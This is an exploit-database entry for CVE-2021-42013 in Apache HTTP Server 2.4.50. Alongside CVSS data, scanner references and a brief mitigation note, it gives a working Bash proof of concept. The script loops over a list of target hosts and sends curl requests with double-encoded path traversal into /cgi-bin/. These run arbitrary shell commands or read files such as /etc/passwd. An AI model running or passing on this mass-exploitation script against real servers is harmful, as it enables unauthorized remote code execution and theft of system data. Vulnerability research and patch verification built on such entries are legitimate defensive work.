header-logo
Suggest Exploit
vendor:
Apache HTTP Server
by:
Lucas Souza
9.8
CVSS
CRITICAL
Path Traversal & Remote Code Execution (RCE)
22
CWE
Product Name: Apache HTTP Server
Affected Version From: 2.4.50
Affected Version To: 2.4.50
Patch Exists: YES
Related CWE: CVE-2021-42013
CPE: a:apache:http_server:2.4.50
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2021-41773/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2021-41773/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2021-41773/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2021-41773/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2021-41773/https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_normalize_path/https://www.rapid7.com/db/modules/exploit/multi/http/apache_normalize_path_rce/
Other Scripts:
Tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://httpd.apache.org/security/vulnerabilities_24.htmlhttps://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6dhttps://nvd.nist.gov/vuln/detail/CVE-2021-42013https://twitter.com/itsecurityco/status/1446136957117943815http://jvn.jp/en/jp/JVN51106450/index.html
Nuclei Metadata: {'max-request': 3, 'verified': True, 'vendor': 'apache', 'product': 'http_server'}
Platforms Tested: Linux
2021

Exploit: Apache HTTP Server 2.4.50 – Path Traversal & Remote Code Execution (RCE)

This exploit is used to traverse the path of the Apache HTTP Server 2.4.50 and execute remote code. The exploit is written in Bash and uses curl to send a malicious payload to the target server. The payload contains a command that is executed on the target server. The exploit is tested on Apache HTTP Server 2.4.50.

Mitigation:

The Apache HTTP Server should be updated to the latest version. The server should also be configured to only allow trusted users to access the server.
Source

Exploit-DB raw data:

# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage:  https://apache.org/
# Version: 2.4.50
# Tested on: 2.4.50
# CVE : CVE-2021-42013
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
echo ./PoC.sh targets.txt /bin/sh id

exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

Navigation

Suggest Exploit

Services By CQR